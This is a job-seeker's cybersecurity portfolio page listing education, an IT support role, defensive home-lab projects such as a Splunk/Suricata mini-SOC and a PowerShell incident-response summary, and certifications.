01. About Me

I build, monitor, and troubleshoot systems. My experience ranges from Tier 1 IT support to hands-on cybersecurity labs involving SIEM, IDS, threat intelligence, and network security tools.

DEC graduate in Computer Security & Networking, based in Montreal, fluent in French & English, and currently open to SOC analyst and IT support roles.

02. Education

DEC — Computer Security & Networking

Collège de Bois-de-Boulogne · Montreal, QC

Graduated 2025

  • Core focus: network security, ethical hacking, incident response, and system administration.
  • Ran lab environments with Suricata, Splunk, pfSense, and ELK Stack throughout the program.
  • Coursework in cryptography, vulnerability assessment, Windows/Linux hardening, and CCNA-level networking.

Cycle Préparatoire Intégré, Sciences de l'Ingénieur

ENSA Berrechid · Université Hassan 1er · Morocco

2019 – 2021

  • Core curriculum: advanced mathematics (algebra, analysis, probability), physics, electronics, mechanics, and thermodynamics across 4 semesters.
  • Computer science track: algorithmics, C programming, computer architecture, and applied IT tools.
  • Completed the competitive 2-year integrated preparatory cycle, the foundational stage of ENSA Berrechid's 5-year engineering program. Relocated to Montreal in 2021 to pursue specialized studies in applied cybersecurity.

Baccalauréat, Sciences Physiques

Groupe Scolaire RIAD · Casablanca, Morocco

2019

  • Sciences Physiques track, Option Français. Equivalent to the Quebec Diplôme d'études secondaires (DES).
  • Rigorous STEM-focused curriculum covering mathematics, physics, chemistry, and earth sciences with bilingual instruction in French and English.
  • Awarded Félicitations du Jury by the examination board.

03. Where I've Worked

IT Support Technician @ Alorica

July 2025 – December 2025 · Montreal, QC

  • Provided Tier 1/2 IT support for Alorica's internal workforce — diagnosing Windows 10/11, Office 365, VPN, and network peripheral issues across a bilingual (FR/EN) environment at a pace of 25–35 tickets per day.
  • Documented every incident with structured CRM notes to ensure clean handoff and audit trail for L2/L3 escalations.
  • Maintained SLA compliance under high ticket volume — same bilingual communication skills used daily here as in the lab environment.

04. Some Things I've Built

threat_intel_bot.py

Featured Project

Threat Intelligence Automation Bot

Python framework querying AbuseIPDB, VirusTotal, and AlienVault OTX to automate IOC enrichment and risk scoring. Generates structured JSON threat reports for SOC workflows — cutting manual lookup time from minutes per IOC to seconds, with automated severity classification across all three feeds.

Python REST APIs JSON Parsing Linux Automation
view case study
mini_soc_lab.sh — suricata + splunk + wazuh

Featured Project

Home Mini-SOC Lab

Full Security Operations Center on a Raspberry Pi. Suricata IDS with the Emerging Threats ruleset feeds into Splunk SIEM for real-time detection, alert correlation, and custom dashboard visualization. Rule tuning — suppressing noisy scanner signatures and home-network baseline traffic — dropped alert volume from ~120 to ~72 daily alerts over a 3-week cycle (~40% reduction). This lab produced a real documented detection: a PowerShell-based fileless attack caught and contained in 42 minutes — see the IR writeup below.

Suricata Splunk Raspberry Pi rsyslog Linux
view case study
incident_response.log — SEVERITY: CRITICAL

Real Detection

Incident Response: PowerShell Threat Detection

A live detection from my Mini-SOC: Wazuh flagged a Base64-encoded PowerShell command (severity 12) on WIN-LAB-01 attempting a remote stage-2 payload download and scheduled-task persistence. I cross-correlated Wazuh HIDS alerts, Suricata network events, and Sysmon endpoint logs in Splunk, then enriched the C2 IP 185.220.101.42 via my Threat Intel Bot — 100/100 AbuseIPDB, 8/92 VirusTotal flags. Detection to containment: 42 minutes. Host isolated, process terminated, malicious scheduled task removed, forensic artifacts preserved.

MITRE: T1059.001 · PowerShell T1027 · Obfuscation T1053.005 · Sched. Task T1105 · C2 Download
Wazuh Suricata Splunk Sysmon Threat Intel Bot Incident Response
view case study
pihole_dns.conf — ~15,000 domains blocked/day

Featured Project

Network-Wide DNS Security Layer

Pi-hole DNS sinkhole blocking ads and malicious domains across the entire home network. Custom blocklists, regex filtering, and whitelist management. Blocks ~15,000 domains/day with full query logging and per-client visibility.

Pi-hole DNS Security Network Filtering Linux
view case study
pfsense_rules.xml — 3 VLANs · OpenVPN · Suricata IDS

Featured Project

pfSense Firewall — Secure Network Architecture

Three-VLAN segmented lab (LAN / OPT1 / OPT2) with full LAN/WAN separation, per-segment DHCP and DNS, explicit inter-VLAN firewall rules, NAT, and OpenVPN client + site-to-site VPN. Suricata running in inline IDS mode across all interfaces — actively caught and logged intrusion attempts during red team exercises. Default-deny between segments, tuned ruleset, forensic alert review.

pfSense OPNsense OpenVPN VLANs Suricata NAT DNS VirtualBox
view case study

05. Technical Skills

Threat Detection Suricata
SIEM & Log Analysis Splunk
Incident Response MITRE ATT&CK
Network Security pfSense
Endpoint Security Wazuh HIDS
Scripting & Automation Python

Want to see more?

CTF Writeups Blog

06. Certifications

CompTIA CySA+

CompTIA CySA+

Valid 2025–2028

CompTIA Security+

CompTIA Security+

Valid 2025–2028

Cisco CCNA ITN

Cisco CCNA ITN

Cisco CCNA SRWE

Cisco CCNA SRWE

Cisco CCNA ENSA

Cisco CCNA ENSA

Cisco Network Defense

Cisco Network Defense

Microsoft AZ-900

Microsoft AZ-900

Microsoft SC-900

Microsoft SC-900

06.1 Language Certifications

TCF Canada

Test de Connaissance du Français

C1 / B2 — French

CELPIP-G

Canadian English Proficiency

CLB 9 — English

07. What's Next?

Get In Touch

Actively seeking SOC Analyst, IT Support, and Security Operations roles in Montreal. I typically respond within 24 hours.

Or directly: abdelkrim.zouaki.ti@gmail.com